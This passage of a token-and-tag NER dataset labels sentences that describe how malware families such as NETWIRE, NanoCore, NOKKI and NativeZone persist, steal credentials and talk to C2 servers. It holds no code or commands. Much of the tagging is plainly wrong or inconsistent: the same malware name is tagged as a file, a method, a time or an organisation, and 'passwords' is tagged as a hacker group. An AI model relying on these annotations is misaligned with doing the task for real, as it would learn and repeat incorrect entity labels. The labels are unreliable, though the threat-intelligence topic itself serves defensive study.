- "ability", - "to", - "compress", - "archived", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "used", - "a", - "custom", - "encryption", - "algorithm", - "to", - "encrypt", - "collected", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "automatically", - "archive", - "collected", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "retrieve", - "passwords", - "from", - "messaging", - "and", - "mail", - "client", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "the", - "ability", - "to", - "steal", - "credentials", - "from", - "web", - "browsers", - "including", - "Internet", - "Explorer,", - "Opera,", - "Yandex,", - "and", - "Chrome." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "use", - "crontabs", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "the", - "ability", - "to", - "search", - "for", - "files", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "store", - "its", - "configuration", - "information", - "in", - "the", - "Registry", - "under", - "`HKCU:\\Software\\Netwire`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "copy", - "itself", - "to", - "and", - "launch", - "itself", - "from", - "hidden", - "folders." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "downloaded", - "payloads", - "from", - "C2", - "to", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "NETWIRE", - "client", - "has", - "been", - "signed", - "by", - "fake", - "and", - "invalid", - "digital", - "certificates." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "perform", - "keylogging." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "use", - "launch", - "agents", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "the", - "ability", - "to", - "write", - "collected", - "data", - "to", - "a", - "file", - "created", - "in", - "the", - "<code>./LOGS</code>", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "persist", - "via", - "startup", - "options", - "for", - "Login", - "items." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "been", - "executed", - "through", - "luring", - "victims", - "into", - "opening", - "malicious", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "been", - "executed", - "through", - "convincing", - "victims", - "into", - "clicking", - "malicious", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "masqueraded", - "as", - "legitimate", - "software", - "including", - "TeamViewer", - "and", - "macOS", - "Finder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "modify", - "the", - "Registry", - "to", - "store", - "its", - "configuration", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "use", - "Native", - "API", - "including", - "<code>CreateProcess</code>", - "<code>GetProcessById</code>,", - "and", - "<code>WriteProcessMemory</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "use", - "TCP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "used", - "a", - "custom", - "obfuscation", - "algorithm", - "to", - "hide", - "strings", - "including", - "Registry", - "keys,", - "APIs,", - "and", - "DLL", - "names." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "NETWIRE", - "binary", - "has", - "been", - "executed", - "via", - "PowerShell", - "script." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "discover", - "processes", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "NETWIRE", - "payload", - "has", - "been", - "injected", - "into", - "benign", - "Microsoft", - "executables", - "via", - "process", - "hollowing." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "inject", - "code", - "into", - "system", - "processes", - "including", - "notepad.exe,", - "svchost.exe,", - "and", - "vbc.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "implement", - "use", - "of", - "proxies", - "to", - "pivot", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "creates", - "a", - "Registry", - "start-up", - "entry", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "create", - "a", - "scheduled", - "task", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "capture", - "the", - "victim's", - "screen." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "used", - ".NET", - "packer", - "tools", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "been", - "spread", - "via", - "e-mail", - "campaigns", - "utilizing", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "been", - "spread", - "via", - "e-mail", - "campaigns", - "utilizing", - "malicious", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "use", - "AES", - "encryption", - "for", - "C2", - "data", - "transferred." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "discover", - "and", - "collect", - "victim", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "collect", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "capture", - "session", - "logon", - "details", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "the", - "ability", - "to", - "use", - "<code>/bin/bash</code>", - "and", - "<code>/bin/sh</code>", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "been", - "executed", - "through", - "use", - "of", - "VBScripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "the", - "ability", - "to", - "communicate", - "over", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "used", - "web", - "services", - "including", - "Paste.ee", - "to", - "host", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "issue", - "commands", - "using", - "cmd.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "use", - "XDG", - "Autostart", - "Entries", - "to", - "establish", - "persistence", - "on", - "Linux", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NGLite", - "has", - "abused", - "NKN", - "infrastructure", - "for", - "its", - "C2", - "communication." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NGLite", - "will", - "use", - "an", - "AES", - "encrypted", - "channel", - "for", - "command", - "and", - "control", - "purposes,", - "in", - "one", - "case", - "using", - "the", - "key", - "<code>WHATswrongwithUu</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NGLite", - "identifies", - "the", - "victim", - "system", - "MAC", - "and", - "IPv4", - "addresses", - "and", - "uses", - "these", - "to", - "establish", - "a", - "victim", - "identifier." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NGLite", - "will", - "run", - "the", - "<code>whoami</code>", - "command", - "to", - "gather", - "system", - "information", - "and", - "return", - "this", - "to", - "the", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NGLite", - "will", - "initially", - "beacon", - "out", - "to", - "the", - "NKN", - "network", - "via", - "an", - "HTTP", - "POST", - "over", - "TCP", - "30003." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "uses", - "a", - "Cron", - "job", - "to", - "establish", - "persistence", - "when", - "infecting", - "Linux", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "utilizes", - "external", - "services", - "such", - "as", - "<code>ifconfig.me</code>", - "to", - "identify", - "the", - "victim", - "machine's", - "IP", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "has", - "abused", - "the", - "NKN", - "public", - "blockchain", - "protocol", - "for", - "its", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "enables", - "multiple", - "types", - "of", - "network", - "denial", - "of", - "service", - "capabilities", - "across", - "several", - "protocols", - "post-installation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "will", - "check", - "victim", - "systems", - "to", - "ensure", - "only", - "one", - "copy", - "of", - "the", - "malware", - "is", - "running." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "can", - "take", - "screenshots", - "of", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "conducts", - "multiple", - "system", - "checks", - "and", - "includes", - "these", - "in", - "subsequent", - "\"heartbeat\"", - "messages", - "to", - "the", - "malware's", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NKAbuse", - "is", - "initially", - "installed", - "and", - "executed", - "through", - "an", - "initial", - "shell", - "script." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "uses", - "the", - "Windows", - "call", - "SetWindowsHookEx", - "and", - "begins", - "injecting", - "it", - "into", - "every", - "GUI", - "process", - "running", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "uses", - "a", - "unique,", - "custom", - "de-obfuscation", - "technique." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "can", - "delete", - "files", - "to", - "cover", - "tracks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "has", - "used", - "FTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "has", - "downloaded", - "a", - "remote", - "module", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "can", - "collect", - "data", - "from", - "the", - "victim", - "and", - "stage", - "it", - "in", - "<code>LOCALAPPDATA%\\MicroSoft", - "Updatea\\uplog.tmp</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "is", - "written", - "to", - "%LOCALAPPDATA%\\MicroSoft", - "Updatea\\svServiceUpdate.exe", - "prior", - "being", - "executed", - "in", - "a", - "new", - "process", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "folder", - "and", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "uses", - "Base64", - "encoding", - "for", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "has", - "established", - "persistence", - "by", - "writing", - "the", - "payload", - "to", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "has", - "used", - "rundll32", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "can", - "gather", - "information", - "on", - "drives", - "and", - "the", - "operating", - "system", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "can", - "gather", - "information", - "on", - "the", - "victim", - "IP", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "can", - "collect", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "can", - "collect", - "the", - "current", - "timestamp", - "of", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NOKKI", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naid", - "creates", - "Registry", - "entries", - "that", - "store", - "information", - "about", - "a", - "created", - "service", - "and", - "point", - "to", - "a", - "malicious", - "DLL", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naid", - "collects", - "a", - "unique", - "identifier", - "(UID)", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naid", - "collects", - "the", - "domain", - "name", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naid", - "creates", - "a", - "new", - "service", - "to", - "establish." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "uses", - "DNS", - "for", - "the", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "can", - "change", - "Internet", - "Explorer", - "settings", - "to", - "reduce", - "warnings", - "about", - "malware", - "activity." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "NanHaiShu", - "encodes", - "files", - "in", - "Base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "launches", - "a", - "script", - "to", - "delete", - "their", - "original", - "decoy", - "file", - "to", - "cover", - "tracks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "can", - "download", - "additional", - "files", - "from", - "URLs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "executes", - "additional", - "Jscript", - "code", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "uses", - "mshta.exe", - "to", - "load", - "its", - "program", - "and", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "modifies", - "the", - "%regrun%", - "Registry", - "to", - "point", - "itself", - "to", - "an", - "autostart", - "mechanism." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "can", - "gather", - "the", - "victim", - "computer", - "name", - "and", - "serial", - "number." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "can", - "gather", - "information", - "about", - "the", - "victim", - "proxy", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "collects", - "the", - "username", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanHaiShu", - "executes", - "additional", - "VBScript", - "code", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "can", - "capture", - "audio", - "feeds", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "can", - "modify", - "the", - "victim's", - "firewall." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "NanoCore", - "can", - "modify", - "the", - "victim's", - "anti-virus." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "has", - "the", - "capability", - "to", - "download", - "and", - "activate", - "additional", - "modules", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "can", - "perform", - "keylogging", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "has", - "the", - "capability", - "to", - "edit", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "NanoCore’s", - "plugins", - "were", - "obfuscated", - "with", - "Eazfuscater.NET", - "3.3." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "NanoCore", - "creates", - "a", - "RunOnce", - "key", - "in", - "the", - "Registry", - "to", - "execute", - "its", - "VBS", - "scripts", - "each", - "time", - "the", - "user", - "logs", - "on", - "to", - "the", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "uses", - "DES", - "to", - "encrypt", - "the", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "gathers", - "the", - "IP", - "address", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "can", - "access", - "the", - "victim's", - "webcam", - "and", - "capture", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "NanoCore", - "uses", - "VBS", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "B-Features" - ] - }, - { - "tokens": [ - "NanoCore", - "can", - "open", - "a", - "remote", - "command-line", - "interface", - "and", - "execute", - "commands.", - "NanoCore", - "uses", - "JavaScript", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-SamFile", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "NativeZone", - "can", - "decrypt", - "and", - "decode", - "embedded", - "Cobalt", - "Strike", - "beacon", - "stage", - "shellcode." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "NativeZone", - "can", - "check", - "for", - "the", - "presence", - "of", - "KM.EkeyAlmaz1C.dll", - "and", - "will", - "halt", - "execution", - "unless", - "it", - "is", - "in", - "the", - "same", - "directory", - "as", - "the", - "rest", - "of", - "the", - "malware's", - "components." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NativeZone", - "can", - "display", - "an", - "RTF", - "document", - "to", - "the", - "user", - "to", - "enable", - "execution", - "of", - "Cobalt", - "Strike", - "stage", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NativeZone", - "has,", - "upon", - "execution,", - "displayed", - "a", - "message", - "box", - "that", - "appears", - "to", - "be", - "related", - "to", - "a", - "Ukrainian", - "electronic", - "document", - "management", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NativeZone", - "has", - "used", - "rundll32", - "to", - "execute", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "NativeZone", - "has", - "checked", - "if", - "Vmware", - "or", - "VirtualBox", - "VM", - "is", - "running", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "can", - "download", - "files", - "remotely." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "logs", - "the", - 